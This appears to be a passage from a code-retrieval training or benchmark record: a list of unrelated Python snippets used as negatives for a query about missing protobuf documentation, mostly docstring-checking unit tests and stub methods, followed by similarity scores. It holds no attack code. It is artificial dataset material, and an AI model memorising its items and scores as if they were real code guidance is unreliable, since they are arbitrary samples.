num, irc)", "def implement(self):\n\t#@DEBUG remove comments", "def magic_pdoc(self, parameter_s=''):\n self._inspect('pdoc',parameter_s)", "def dummy(doc):\r\n return doc", "def _add_doc(func, doc):\n func.__doc__ = doc", "def test_proto_spec(self):\n proto_name = 'org.xlattice.upax'\n node_reg = reg.NodeReg()\n proto_reg = reg.ProtoReg(proto_name, node_reg)\n msg_reg = reg.MsgReg(proto_reg)\n proto_spec = M.ProtoSpec(proto_name, proto_reg)\n self.assertEqual(proto_name, proto_spec.name)\n parent = M.ProtoSpec(proto_name, proto_reg)\n\n msg_name = 'logEntry'\n # the enum is not used\n enum = M.EnumSpec.create('Joe', [\n ('oh', 92), ('hello', 47), ('there', 322), ])\n fields = [\n # pylint: disable=no-member\n M.FieldSpec(\n msg_reg,\n 'timestamp',\n FieldTypes.F_UINT32,\n Quants.REQUIRED,\n 0),\n M.FieldSpec(\n msg_reg,\n 'node_id',\n FieldTypes.F_BYTES20,\n Quants.REQUIRED,\n 1),\n M.FieldSpec(\n msg_reg,\n 'key',\n FieldTypes.F_BYTES20,\n Quants.REQUIRED,\n 2),\n M.FieldSpec(\n msg_reg,\n 'length',\n FieldTypes.V_UINT32,\n Quants.REQUIRED,\n 3),\n M.FieldSpec(\n msg_reg,\n 'by_',\n FieldTypes.L_STRING,\n Quants.REQUIRED,\n 4),\n M.FieldSpec(\n msg_reg,\n 'path',\n FieldTypes.L_STRING,\n Quants.REQUIRED,\n 5),\n ]\n msg_spec = M.MsgSpec(msg_name, msg_reg, proto_spec)\n self.assertEqual(msg_name, msg_spec.name)\n for file in fields:\n msg_spec.add_field(file)\n\n # proto_spec.add_msg(msg_spec) # correctly commented out\n self.round_trip_poto_spec_via_string(proto_spec) # GEEP", "def test_student_class_docstring(self):\n self.assertIsNot(Student.__doc__, None,\n \"Student class needs a docstring\")\n self.assertTrue(len(Student.__doc__) >= 1,\n \"Student class needs a docstring\")", "def main_docstring():", "def test_docstring(self):\n self.assertTrue(len(FileStorage.__doc__) > 1)\n self.assertTrue(len(FileStorage.all.__doc__) > 1)\n self.assertTrue(len(FileStorage.new.__doc__) > 1)\n self.assertTrue(len(FileStorage.save.__doc__) > 1)\n self.assertTrue(len(FileStorage.reload.__doc__) > 1)", "def describe(self):\n return \"The method describe() is not implemented\"", "def test_console_documented(self):\n self.assertTrue\n self.assertTrue\n (len(HBNBCommand.__doc__) >= 1)", "def test_class_docstrings(self):\n self.assertGreater(len(self.storage.__doc__), 1)", "def __init__(self, proto):\n self.proto = proto", "def func_doc():", "def get_documentation(self, *args, **dargs):\n pass", "def __init__ (self, isInternal, docstring, name, args, isConst):\n\n self.name = name\n self.isConst = isConst\n self.isInternal = isInternal\n\n if isInternal:\n if language == 'java':\n # We have a special Javadoc doclet that understands a non-standard\n # Javadoc tag, @internal. When present in the documentation string\n # of a method, it causes it to be excluded from the final\n # documentation output. @internal is something doxygen offers.\n #\n p = re.compile('(\\s+?)\\*/', re.MULTILINE)\n self.docstring = p.sub(r'\\1* @internal\\1*/', docstring)\n elif language == 'csharp':\n # We mark internal methods in a different way for C#.\n self.docstring = docstring\n else:\n self.docstring = \" @internal\\n\" + docstring\n else:\n self.docstring = docstring\n\n # In Java and C#, if a method is const and swig has to translate the type,\n # then for some reason swig cannot match up the resulting doc strings\n # that we put into %javamethodmodifiers. The result is that the java\n # documentation for the methods are empty. I can't figure out why, but\n # have figured out that if we omit the argument list in the doc string\n # that is put on %javamethodmodifiers for such case, swig does generate \n # the comments for those methods. This approach is potentially dangerous\n # because swig might attach the doc string to the wrong method if a\n # methods has multiple versions with varying argument types, but the\n # combination doesn't seem to arise in antimony currently, and anyway,\n # this fixes a real problem in the Java documentation for antimony.\n\n if language == 'java' or language == 'csharp':\n if isConst and (args.find('unsigned int') >= 0):\n self.args = ''\n elif not args.strip() == '()':\n if isConst:\n self.args = args + ' const'\n else:\n self.args = args\n else:\n if isConst:\n self.args = '() const'\n else:\n self.args = ''\n else:\n self.args = args", "def guess(cls, docstring):", "def HandleMissingParameterDoc(self, token, param_name):\n raise TypeError('Abstract method HandleMissingParameterDoc not implemented')", "def shortDescription(self):\n # Suppress default logging of docstrings.\n return None", "def docs():", "def __init__(self):\n super(MethodInfo, self).__init__()\n self.DocString = None", "def test_file_storage_module_docstring(self):\n self.assertIsNot(file_storage.__doc__, None,\n \"file_storage.py needs a docstring\")\n self.assertTrue(len(file_storage.__doc__) >= 1,\n \"file_storage.py needs a docstring\")", "def handle_protobuf(self, message: protobuf.ProtocolMessage) -> None:", "def test_doc_file(self):\n expected = 'City class handles all application cities'\n actual = City.__doc__\n self.assertEqual(expected, actual)", "def missed_needed_docstring(self):\n self.needed += 1\n self.missing += 1", "def test_documentation(self):\n self.assertTrue(hasattr(Rectangle, \"__init__\"))\n self.assertTrue(Rectangle.__init__.__doc__)\n self.assertTrue(hasattr(Rectangle, \"width\"))\n self.assertTrue(Rectangle.width.__doc__)\n self.assertTrue(hasattr(Rectangle, \"height\"))\n self.assertTrue(Rectangle.height.__doc__)\n self.assertTrue(hasattr(Rectangle, \"x\"))\n self.assertTrue(Rectangle.x.__doc__)\n self.assertTrue(hasattr(Rectangle, \"y\"))\n self.assertTrue(Rectangle.y.__doc__)\n self.assertTrue(hasattr(Rectangle, \"area\"))\n self.assertTrue(Rectangle.area.__doc__)\n self.assertTrue(hasattr(Rectangle, \"display\"))\n self.assertTrue(Rectangle.display.__doc__)\n self.assertTrue(hasattr(Rectangle, \"__str__\"))\n self.assertTrue(Rectangle.__str__.__doc__)\n self.assertTrue(hasattr(Rectangle, \"update\"))\n self.assertTrue(Rectangle.update.__doc__)\n self.assertTrue(hasattr(Rectangle, \"to_dictionary\"))\n self.assertTrue(Rectangle.to_dictionary.__doc__)", "def __init__(\n self,\n *,\n public_comment: typing.Optional[str] = None,\n status: typing.Optional[Assignment.Status] = None\n ) -> None:\n ...", "def test_class_doc(self):\n self.assertTrue(len(City.__doc__) > 0)", "def test_doc1(self):\n assert models.review.__doc__ is not None", "def test_doctest(self):\n self.assertTrue(BaseModel.__doc__)\n self.assertTrue(BaseModel.__init__.__doc__)\n self.assertTrue(BaseModel.__str__.__doc__)\n self.assertTrue(BaseModel.save.__doc__)\n self.assertTrue(BaseModel.to_dict.__doc__)", "def should_add_pr_comment(self):\n pass", "def test_findDocumentation(self):\n doc = self.builder._findChanges(\n self.project, self.builder._DOC)\n self.assertEquals(\n doc,\n [(40, 'foo.bar.Baz.quux'),\n (41, 'writing Foo servers')])", "def test_doc_with_comments():\n doc = CoNLL.conll2doc(input_str=RUSSIAN_SAMPLE)\n check_russian_doc(doc)", "def test_method_docs(self):\n for func in dir(Base):\n self.assertTrue(len(func.__doc__) > 0)", "def public_fn_with_googley_docstring(self, name, another, state=None):\n return 0", "def test_state_class_docstring(self):\n self.assertIsNot(State.__doc__, None,\n \"docstring not found in State class\")\n self.assertTrue(len(State.__doc__) >= 1,\n \"docstring not found in State class\")", "def getStructPb2():\n return struct_pb2", "def to_proto(self) -> None:\n\n pass", "def test_doc_string():\n # Create fake profiles library by named tuples\n faker_db = session10.create_fake_library_by_namedtuple(10)\n\n assert len(faker_db.__doc__) > 0 , \"Doc string is missing\"", "def test_swagger_field_is_required():\n raw_schema = RawSchemaFactory()\n raw_schema.pop('swagger', None)\n\n assert 'swagger' not in raw_schema\n\n with pytest.raises(ValidationError) as err:\n swagger_schema_validator(raw_schema)\n\n assert_message_in_errors(\n MESSAGES['required']['required'],\n err.value.detail,\n 'required.swagger',\n )", "def brief_documentation(method: object) -> str:\n doc = method.__doc__\n if doc is not None:\n lines = doc.splitlines()\n if len(lines) > 0:\n return lines[0]\n return ''", "def proto_generation_callable(self):\n raise NotImplementedError()", "def proto_generation_callable(self):\n raise NotImplementedError()", "def document(self):\n ...", "def assert_doc_extensions(doc):\n pass", "def comment():", "def test_doc_module(self):\n from models import user\n\n self.assertTrue(len(user.__doc__) > 0)\n self.assertTrue(len(user.User.__doc__) > 0)", "def test_doc(cls, type_str):\n do_doc_test(cls, type_str)", "def test_docstring(self):\n self.assertIsNotNone(City.__doc__)" ]
[ "0.6348721", "0.6232983", "0.6227791", "0.6107919", "0.6073252", "0.6056996", "0.60199225", "0.5997295", "0.5973073", "0.59475285", "0.59426475", "0.59348774", "0.59195995", "0.59041727", "0.5899058", "0.5865414", "0.5857725", "0.5836395", "0.57917976", "0.57693964", "0.5765628", "0.5738139", "0.5725729", "0.57218313", "0.57099766", "0.5694849", "0.5634908", "0.5631503", "0.562838", "0.5627863", "0.5609239", "0.55800056", "0.5575202", "0.5568366", "0.5556774", "0.554996", "0.55403715", "0.5535095", "0.55324805", "0.55324376", "0.5515471", "0.551169", "0.5499882", "0.54952186", "0.54851204", "0.547969", "0.54744124", "0.5465293", "0.5460546", "0.5460546", "0.5460546", "0.5452012", "0.54468", "0.542486", "0.54212755", "0.5413558", "0.5397512", "0.53957206", "0.53943235", "0.5388301", "0.5376187", "0.5353345", "0.534334", "0.5337087", "0.5336514", "0.53339815", "0.5328619", "0.53255814", "0.53247285", "0.5322686", "0.5319762", "0.53191066", "0.53140306", "0.53077936", "0.5279659", "0.5267621", "0.5264218", "0.5252085", "0.5219406", "0.5217774", "0.5214222", "0.5213382", "0.52094376", "0.52063346", "0.5204785", "0.5193972", "0.5189197", "0.51867706", "0.5182037", "0.51802737", "0.5177115", "0.5172607", "0.5164527", "0.51625025", "0.51625025", "0.5162299", "0.5160613", "0.5157092", "0.51471317", "0.5142684", "0.51393735" ]
0.0
-1
Missing associated documentation comment in .proto file.
def Dump(self, request, context): context.set_code(grpc.StatusCode.UNIMPLEMENTED) context.set_details('Method not implemented!') raise NotImplementedError('Method not implemented!')
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def init_doc(self):\n raise NotImplementedError()", "def inherits_doc():\n pass", "def documentation_only():\n pass", "def DocString():\n return", "def test_module_doc(self):\n self.assertTrue(len(base.__doc__) > 0)", "def pythondoc(self, irc, msg, args, num, req):\n self.googleq('http://docs.python.org/library/', req, num, irc)", "def cppdoc(self, irc, msg, args, num, req):\n self.googleq('www.cplusplus.com/reference/', req, num, irc)", "def testDocstring(self):\n class NotImportant(messages.Enum):\n \"\"\"I have a docstring.\"\"\"\n\n VALUE1 = 1\n\n self.assertEquals('I have a docstring.', NotImportant.__doc__)", "def test_module_doc(self):\n self.assertTrue(len(base_model.__doc__) > 0)", "def phpdoc(self, irc, msg, args, num, req):\n self.googleq('http://php.net/manual/en/', req, num, irc)", "def strip_doc_string(proto: google.protobuf.message.Message) -> None:\n if not isinstance(proto, google.protobuf.message.Message):\n raise TypeError(\n f\"proto must be an instance of {google.protobuf.message.Message}.\"\n )\n for descriptor in proto.DESCRIPTOR.fields:\n if descriptor.name == \"doc_string\":\n proto.ClearField(descriptor.name)\n elif descriptor.type == descriptor.TYPE_MESSAGE:\n if descriptor.label == descriptor.LABEL_REPEATED:\n for x in getattr(proto, descriptor.name):\n strip_doc_string(x)\n elif proto.HasField(descriptor.name):\n strip_doc_string(getattr(proto, descriptor.name))", "def docstring_hack():\n pass", "def check_documentation(self):\n\n self.assertIsNotNone(BaseModel.__doc__)\n self.assertIsNotNone(__init__.__doc__)\n self.assertIsNotNone(__str__.__doc__)\n self.assertIsNotNone(save.__doc__)\n self.assertIsNotNone(to_dict.__doc__)", "def consistent_documentation():\n\n return 3", "def test_init_doc(self):\n self.assertTrue(\n len(Review.__init__.__doc__) > 10\n )", "def test_missing_docstring(a, b): # noqa: D213, D407", "def test_docstring(self):\n self.assertIsNotNone(Review.__doc__)", "def test_docstring(self):\n self.assertTrue(len(BaseModel.__doc__) > 1)\n self.assertTrue(len(BaseModel.__init__.__doc__) > 1)\n self.assertTrue(len(BaseModel.__str__.__doc__) > 1)\n self.assertTrue(len(BaseModel.save.__doc__) > 1)\n self.assertTrue(len(BaseModel.to_dict.__doc__) > 1)", "def __doc__(self, ???):", "def test_class_doc(self):\n self.assertTrue(\n len(Review.__doc__) > 10\n )", "def test_module_doc(self):\n self.assertTrue(len(amenity.__doc__) > 0)", "def test_docstring(self):\n self.assertIsNotNone(Base.__doc__)", "def test_module_doc(self):\n self.assertTrue(len(r.__doc__) > 10)", "def test_docstring(self):\n self.assertIsNotNone(Place.__doc__)", "def test_documentation(self):\n self.assertTrue(hasattr(Base, \"__init__\"))\n self.assertTrue(hasattr(Base, \"create\"))\n self.assertTrue(hasattr(Base, \"to_json_string\"))\n self.assertTrue(hasattr(Base, \"from_json_string\"))\n self.assertTrue(hasattr(Base, \"save_to_file\"))\n self.assertTrue(hasattr(Base, \"load_from_file\"))\n self.assertTrue(Base.__init__.__doc__)\n self.assertTrue(Base.create.__doc__)\n self.assertTrue(Base.to_json_string.__doc__)\n self.assertTrue(Base.from_json_string.__doc__)\n self.assertTrue(Base.save_to_file.__doc__)\n self.assertTrue(Base.load_from_file.__doc__)", "def has_doc() -> None:", "def test_doc(self):\n self.assertTrue(len(max_integer.__doc__) > 0)\n self.assertTrue(len(__import__('6-max_integer').__doc__) > 0)", "def test_docstring(self):\n self.assertTrue(len(City.__doc__) > 1)\n self.assertTrue(len(City.__init__.__doc__) > 1)\n self.assertTrue(len(City.__str__.__doc__) > 1)\n self.assertTrue(len(City.save.__doc__) > 1)\n self.assertTrue(len(City.to_dict.__doc__) > 1)", "def test_docstring(self):\n self.assertIsNotNone(Review.__doc__)\n self.assertIsNotNone(Review.text.__doc__)", "def test_docstring(self):\n self.assertIsNotNone(BaseModel.__doc__)\n self.assertIsNotNone(BaseModel.__init__.__doc__)\n self.assertIsNotNone(BaseModel.save.__doc__)", "def fini_doc(self):\n raise NotImplementedError()", "def test_doc():\n pass", "def test_module_doc(self):\n self.assertTrue(len(user.__doc__) > 0)", "def lispdoc(self, irc, msg, args, num, req):\n self.googleq('http://lispdoc.com/', req, num, irc)", "def test_module_doc(self):\n self.assertTrue(len(models.amenity.__doc__) > 0)", "def bus_func_doc(self, bus):\n return None", "def test_doc2(self):\n assert Review.__doc__ is not None", "def c_comment(self, token: Token):\n if token.value.startswith(\"/**\"):\n self.doc_comments.append(PrefixCppDocComment(token))", "def test_module_doc(self):\n self.assertTrue(len(State.__doc__) > 0)", "def test_module_doc(self):\n self.assertTrue(len(db_storage.__doc__) > 0)", "def test_BaseModel_cls_doc(self):\n self.assertIsNotNone(BaseModel.__doc__)", "def doc_string():\n pass # pass does nothing", "def test_docstrings(self):\n self.assertEqual(len(Rectangle.__doc__) > 0, True)\n self.assertTrue(hasattr(Rectangle, \"__init__\"))\n self.assertTrue(Rectangle.__init__.__doc__)\n self.assertTrue(hasattr(Rectangle, \"width\"))\n self.assertTrue(Rectangle.width.__doc__)\n self.assertTrue(hasattr(Rectangle, \"height\"))\n self.assertTrue(Rectangle.height.__doc__)\n self.assertTrue(hasattr(Rectangle, \"x\"))\n self.assertTrue(Rectangle.x.__doc__)\n self.assertTrue(hasattr(Rectangle, \"y\"))\n self.assertTrue(Rectangle.y.__doc__)\n self.assertTrue(hasattr(Rectangle, \"area\"))\n self.assertTrue(Rectangle.area.__doc__)\n self.assertTrue(hasattr(Rectangle, \"display\"))\n self.assertTrue(Rectangle.display.__doc__)\n self.assertTrue(hasattr(Rectangle, \"__str__\"))\n self.assertTrue(Rectangle.__str__.__doc__)\n self.assertTrue(hasattr(Rectangle, \"update\"))\n self.assertTrue(Rectangle.update.__doc__)\n self.assertTrue(hasattr(Rectangle, \"to_dictionary\"))\n self.assertTrue(Rectangle.to_dictionary.__doc__)", "def test_student_module_docstring(self):\n self.assertIsNot(student.__doc__, None,\n \"student.py needs a docstring\")\n self.assertTrue(len(student.__doc__) >= 1,\n \"student.py needs a docstring\")", "def test_documentation(self):\n doc = City.__doc__\n self.assertGreaterEqual(len(doc), 1)", "def test_Userdoc(self):\n self.assertNotEqual(len(User.__doc__), 0)", "def __init__ (self, docstring, name, isInternal):\n\n # Take out excess leading blank lines.\n docstring = re.sub('/\\*\\*(\\s+\\*)+', r'/** \\n *', docstring)\n\n self.docstring = docstring\n self.name = name\n self.isInternal = isInternal", "def test_module_doc(self):\n self.assertTrue(len(city.__doc__) > 0)", "def _add_doc(func, doc):\r\n func.__doc__ = doc", "def _add_doc(func, doc):\r\n func.__doc__ = doc", "def _add_doc(func, doc):\r\n func.__doc__ = doc", "def test_BaseModel_methods_doc(self):\n self.assertIsNotNone(BaseModel.__init__.__doc__)\n self.assertIsNotNone(BaseModel.__str__.__doc__)\n self.assertIsNotNone(BaseModel.save.__doc__)\n self.assertIsNotNone(BaseModel.to_dict.__doc__)", "def javadoc(self, irc, msg, args, num, req):\n self.googleq('download.oracle.com/javase/6/docs/', req, num, irc)", "def implement(self):\n\t#@DEBUG remove comments", "def magic_pdoc(self, parameter_s=''):\n self._inspect('pdoc',parameter_s)", "def dummy(doc):\r\n return doc", "def test_proto_spec(self):\n proto_name = 'org.xlattice.upax'\n node_reg = reg.NodeReg()\n proto_reg = reg.ProtoReg(proto_name, node_reg)\n msg_reg = reg.MsgReg(proto_reg)\n proto_spec = M.ProtoSpec(proto_name, proto_reg)\n self.assertEqual(proto_name, proto_spec.name)\n parent = M.ProtoSpec(proto_name, proto_reg)\n\n msg_name = 'logEntry'\n # the enum is not used\n enum = M.EnumSpec.create('Joe', [\n ('oh', 92), ('hello', 47), ('there', 322), ])\n fields = [\n # pylint: disable=no-member\n M.FieldSpec(\n msg_reg,\n 'timestamp',\n FieldTypes.F_UINT32,\n Quants.REQUIRED,\n 0),\n M.FieldSpec(\n msg_reg,\n 'node_id',\n FieldTypes.F_BYTES20,\n Quants.REQUIRED,\n 1),\n M.FieldSpec(\n msg_reg,\n 'key',\n FieldTypes.F_BYTES20,\n Quants.REQUIRED,\n 2),\n M.FieldSpec(\n msg_reg,\n 'length',\n FieldTypes.V_UINT32,\n Quants.REQUIRED,\n 3),\n M.FieldSpec(\n msg_reg,\n 'by_',\n FieldTypes.L_STRING,\n Quants.REQUIRED,\n 4),\n M.FieldSpec(\n msg_reg,\n 'path',\n FieldTypes.L_STRING,\n Quants.REQUIRED,\n 5),\n ]\n msg_spec = M.MsgSpec(msg_name, msg_reg, proto_spec)\n self.assertEqual(msg_name, msg_spec.name)\n for file in fields:\n msg_spec.add_field(file)\n\n # proto_spec.add_msg(msg_spec) # correctly commented out\n self.round_trip_poto_spec_via_string(proto_spec) # GEEP", "def _add_doc(func, doc):\n func.__doc__ = doc", "def test_student_class_docstring(self):\n self.assertIsNot(Student.__doc__, None,\n \"Student class needs a docstring\")\n self.assertTrue(len(Student.__doc__) >= 1,\n \"Student class needs a docstring\")", "def main_docstring():", "def test_docstring(self):\n self.assertTrue(len(FileStorage.__doc__) > 1)\n self.assertTrue(len(FileStorage.all.__doc__) > 1)\n self.assertTrue(len(FileStorage.new.__doc__) > 1)\n self.assertTrue(len(FileStorage.save.__doc__) > 1)\n self.assertTrue(len(FileStorage.reload.__doc__) > 1)", "def describe(self):\n return \"The method describe() is not implemented\"", "def test_console_documented(self):\n self.assertTrue\n self.assertTrue\n (len(HBNBCommand.__doc__) >= 1)", "def __init__(self, proto):\n self.proto = proto", "def test_class_docstrings(self):\n self.assertGreater(len(self.storage.__doc__), 1)", "def func_doc():", "def get_documentation(self, *args, **dargs):\n pass", "def __init__ (self, isInternal, docstring, name, args, isConst):\n\n self.name = name\n self.isConst = isConst\n self.isInternal = isInternal\n\n if isInternal:\n if language == 'java':\n # We have a special Javadoc doclet that understands a non-standard\n # Javadoc tag, @internal. When present in the documentation string\n # of a method, it causes it to be excluded from the final\n # documentation output. @internal is something doxygen offers.\n #\n p = re.compile('(\\s+?)\\*/', re.MULTILINE)\n self.docstring = p.sub(r'\\1* @internal\\1*/', docstring)\n elif language == 'csharp':\n # We mark internal methods in a different way for C#.\n self.docstring = docstring\n else:\n self.docstring = \" @internal\\n\" + docstring\n else:\n self.docstring = docstring\n\n # In Java and C#, if a method is const and swig has to translate the type,\n # then for some reason swig cannot match up the resulting doc strings\n # that we put into %javamethodmodifiers. The result is that the java\n # documentation for the methods are empty. I can't figure out why, but\n # have figured out that if we omit the argument list in the doc string\n # that is put on %javamethodmodifiers for such case, swig does generate \n # the comments for those methods. This approach is potentially dangerous\n # because swig might attach the doc string to the wrong method if a\n # methods has multiple versions with varying argument types, but the\n # combination doesn't seem to arise in antimony currently, and anyway,\n # this fixes a real problem in the Java documentation for antimony.\n\n if language == 'java' or language == 'csharp':\n if isConst and (args.find('unsigned int') >= 0):\n self.args = ''\n elif not args.strip() == '()':\n if isConst:\n self.args = args + ' const'\n else:\n self.args = args\n else:\n if isConst:\n self.args = '() const'\n else:\n self.args = ''\n else:\n self.args = args", "def guess(cls, docstring):", "def HandleMissingParameterDoc(self, token, param_name):\n raise TypeError('Abstract method HandleMissingParameterDoc not implemented')", "def shortDescription(self):\n # Suppress default logging of docstrings.\n return None", "def docs():", "def __init__(self):\n super(MethodInfo, self).__init__()\n self.DocString = None", "def test_file_storage_module_docstring(self):\n self.assertIsNot(file_storage.__doc__, None,\n \"file_storage.py needs a docstring\")\n self.assertTrue(len(file_storage.__doc__) >= 1,\n \"file_storage.py needs a docstring\")", "def handle_protobuf(self, message: protobuf.ProtocolMessage) -> None:", "def test_doc_file(self):\n expected = 'City class handles all application cities'\n actual = City.__doc__\n self.assertEqual(expected, actual)", "def missed_needed_docstring(self):\n self.needed += 1\n self.missing += 1", "def test_documentation(self):\n self.assertTrue(hasattr(Rectangle, \"__init__\"))\n self.assertTrue(Rectangle.__init__.__doc__)\n self.assertTrue(hasattr(Rectangle, \"width\"))\n self.assertTrue(Rectangle.width.__doc__)\n self.assertTrue(hasattr(Rectangle, \"height\"))\n self.assertTrue(Rectangle.height.__doc__)\n self.assertTrue(hasattr(Rectangle, \"x\"))\n self.assertTrue(Rectangle.x.__doc__)\n self.assertTrue(hasattr(Rectangle, \"y\"))\n self.assertTrue(Rectangle.y.__doc__)\n self.assertTrue(hasattr(Rectangle, \"area\"))\n self.assertTrue(Rectangle.area.__doc__)\n self.assertTrue(hasattr(Rectangle, \"display\"))\n self.assertTrue(Rectangle.display.__doc__)\n self.assertTrue(hasattr(Rectangle, \"__str__\"))\n self.assertTrue(Rectangle.__str__.__doc__)\n self.assertTrue(hasattr(Rectangle, \"update\"))\n self.assertTrue(Rectangle.update.__doc__)\n self.assertTrue(hasattr(Rectangle, \"to_dictionary\"))\n self.assertTrue(Rectangle.to_dictionary.__doc__)", "def __init__(\n self,\n *,\n public_comment: typing.Optional[str] = None,\n status: typing.Optional[Assignment.Status] = None\n ) -> None:\n ...", "def test_class_doc(self):\n self.assertTrue(len(City.__doc__) > 0)", "def test_doc1(self):\n assert models.review.__doc__ is not None", "def test_doctest(self):\n self.assertTrue(BaseModel.__doc__)\n self.assertTrue(BaseModel.__init__.__doc__)\n self.assertTrue(BaseModel.__str__.__doc__)\n self.assertTrue(BaseModel.save.__doc__)\n self.assertTrue(BaseModel.to_dict.__doc__)", "def should_add_pr_comment(self):\n pass", "def test_findDocumentation(self):\n doc = self.builder._findChanges(\n self.project, self.builder._DOC)\n self.assertEquals(\n doc,\n [(40, 'foo.bar.Baz.quux'),\n (41, 'writing Foo servers')])", "def test_doc_with_comments():\n doc = CoNLL.conll2doc(input_str=RUSSIAN_SAMPLE)\n check_russian_doc(doc)", "def test_method_docs(self):\n for func in dir(Base):\n self.assertTrue(len(func.__doc__) > 0)", "def public_fn_with_googley_docstring(self, name, another, state=None):\n return 0", "def test_state_class_docstring(self):\n self.assertIsNot(State.__doc__, None,\n \"docstring not found in State class\")\n self.assertTrue(len(State.__doc__) >= 1,\n \"docstring not found in State class\")", "def getStructPb2():\n return struct_pb2", "def to_proto(self) -> None:\n\n pass", "def test_doc_string():\n # Create fake profiles library by named tuples\n faker_db = session10.create_fake_library_by_namedtuple(10)\n\n assert len(faker_db.__doc__) > 0 , \"Doc string is missing\"", "def test_swagger_field_is_required():\n raw_schema = RawSchemaFactory()\n raw_schema.pop('swagger', None)\n\n assert 'swagger' not in raw_schema\n\n with pytest.raises(ValidationError) as err:\n swagger_schema_validator(raw_schema)\n\n assert_message_in_errors(\n MESSAGES['required']['required'],\n err.value.detail,\n 'required.swagger',\n )", "def brief_documentation(method: object) -> str:\n doc = method.__doc__\n if doc is not None:\n lines = doc.splitlines()\n if len(lines) > 0:\n return lines[0]\n return ''", "def proto_generation_callable(self):\n raise NotImplementedError()", "def proto_generation_callable(self):\n raise NotImplementedError()", "def document(self):\n ...", "def assert_doc_extensions(doc):\n pass", "def comment():", "def test_doc_module(self):\n from models import user\n\n self.assertTrue(len(user.__doc__) > 0)\n self.assertTrue(len(user.User.__doc__) > 0)", "def test_doc(cls, type_str):\n do_doc_test(cls, type_str)", "def test_docstring(self):\n self.assertIsNotNone(City.__doc__)" ]
[ "0.6347405", "0.62316597", "0.62253404", "0.6107218", "0.60712713", "0.6055634", "0.60191995", "0.5996731", "0.597168", "0.59466904", "0.59434444", "0.59335643", "0.5919223", "0.5902901", "0.58987755", "0.5864407", "0.5856765", "0.5836615", "0.57913834", "0.57687634", "0.5763714", "0.57372254", "0.5724019", "0.5721367", "0.57097507", "0.5693322", "0.5633919", "0.5631681", "0.5627807", "0.56277686", "0.5608027", "0.55785465", "0.5573401", "0.55674845", "0.55551904", "0.5549059", "0.553947", "0.5534518", "0.5531683", "0.55310714", "0.55151445", "0.55110514", "0.5500249", "0.5493004", "0.548441", "0.5478941", "0.5474353", "0.5463836", "0.5458455", "0.5458455", "0.5458455", "0.5452267", "0.54450864", "0.54251957", "0.5421046", "0.5412398", "0.5397417", "0.5395437", "0.5393102", "0.5386761", "0.53758156", "0.5353344", "0.53435314", "0.5338307", "0.5337008", "0.53325796", "0.53264475", "0.5325588", "0.5324948", "0.5321367", "0.53188294", "0.5317395", "0.5313514", "0.5306335", "0.52826846", "0.526687", "0.5262916", "0.5252228", "0.52204585", "0.52173424", "0.52134776", "0.5213095", "0.5209492", "0.52052844", "0.5204341", "0.51928616", "0.51881623", "0.5186641", "0.51833606", "0.5181922", "0.51770014", "0.51718605", "0.5163659", "0.5162326", "0.5162326", "0.5161769", "0.51591885", "0.5157628", "0.5145468", "0.51423216", "0.5138763" ]
0.0
-1
Missing associated documentation comment in .proto file.
def SetLogLevel(self, request, context): context.set_code(grpc.StatusCode.UNIMPLEMENTED) context.set_details('Method not implemented!') raise NotImplementedError('Method not implemented!')
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def init_doc(self):\n raise NotImplementedError()", "def inherits_doc():\n pass", "def documentation_only():\n pass", "def DocString():\n return", "def test_module_doc(self):\n self.assertTrue(len(base.__doc__) > 0)", "def pythondoc(self, irc, msg, args, num, req):\n self.googleq('http://docs.python.org/library/', req, num, irc)", "def cppdoc(self, irc, msg, args, num, req):\n self.googleq('www.cplusplus.com/reference/', req, num, irc)", "def testDocstring(self):\n class NotImportant(messages.Enum):\n \"\"\"I have a docstring.\"\"\"\n\n VALUE1 = 1\n\n self.assertEquals('I have a docstring.', NotImportant.__doc__)", "def test_module_doc(self):\n self.assertTrue(len(base_model.__doc__) > 0)", "def phpdoc(self, irc, msg, args, num, req):\n self.googleq('http://php.net/manual/en/', req, num, irc)", "def strip_doc_string(proto: google.protobuf.message.Message) -> None:\n if not isinstance(proto, google.protobuf.message.Message):\n raise TypeError(\n f\"proto must be an instance of {google.protobuf.message.Message}.\"\n )\n for descriptor in proto.DESCRIPTOR.fields:\n if descriptor.name == \"doc_string\":\n proto.ClearField(descriptor.name)\n elif descriptor.type == descriptor.TYPE_MESSAGE:\n if descriptor.label == descriptor.LABEL_REPEATED:\n for x in getattr(proto, descriptor.name):\n strip_doc_string(x)\n elif proto.HasField(descriptor.name):\n strip_doc_string(getattr(proto, descriptor.name))", "def docstring_hack():\n pass", "def check_documentation(self):\n\n self.assertIsNotNone(BaseModel.__doc__)\n self.assertIsNotNone(__init__.__doc__)\n self.assertIsNotNone(__str__.__doc__)\n self.assertIsNotNone(save.__doc__)\n self.assertIsNotNone(to_dict.__doc__)", "def consistent_documentation():\n\n return 3", "def test_init_doc(self):\n self.assertTrue(\n len(Review.__init__.__doc__) > 10\n )", "def test_missing_docstring(a, b): # noqa: D213, D407", "def test_docstring(self):\n self.assertIsNotNone(Review.__doc__)", "def test_docstring(self):\n self.assertTrue(len(BaseModel.__doc__) > 1)\n self.assertTrue(len(BaseModel.__init__.__doc__) > 1)\n self.assertTrue(len(BaseModel.__str__.__doc__) > 1)\n self.assertTrue(len(BaseModel.save.__doc__) > 1)\n self.assertTrue(len(BaseModel.to_dict.__doc__) > 1)", "def __doc__(self, ???):", "def test_class_doc(self):\n self.assertTrue(\n len(Review.__doc__) > 10\n )", "def test_module_doc(self):\n self.assertTrue(len(amenity.__doc__) > 0)", "def test_docstring(self):\n self.assertIsNotNone(Base.__doc__)", "def test_module_doc(self):\n self.assertTrue(len(r.__doc__) > 10)", "def test_docstring(self):\n self.assertIsNotNone(Place.__doc__)", "def test_documentation(self):\n self.assertTrue(hasattr(Base, \"__init__\"))\n self.assertTrue(hasattr(Base, \"create\"))\n self.assertTrue(hasattr(Base, \"to_json_string\"))\n self.assertTrue(hasattr(Base, \"from_json_string\"))\n self.assertTrue(hasattr(Base, \"save_to_file\"))\n self.assertTrue(hasattr(Base, \"load_from_file\"))\n self.assertTrue(Base.__init__.__doc__)\n self.assertTrue(Base.create.__doc__)\n self.assertTrue(Base.to_json_string.__doc__)\n self.assertTrue(Base.from_json_string.__doc__)\n self.assertTrue(Base.save_to_file.__doc__)\n self.assertTrue(Base.load_from_file.__doc__)", "def has_doc() -> None:", "def test_doc(self):\n self.assertTrue(len(max_integer.__doc__) > 0)\n 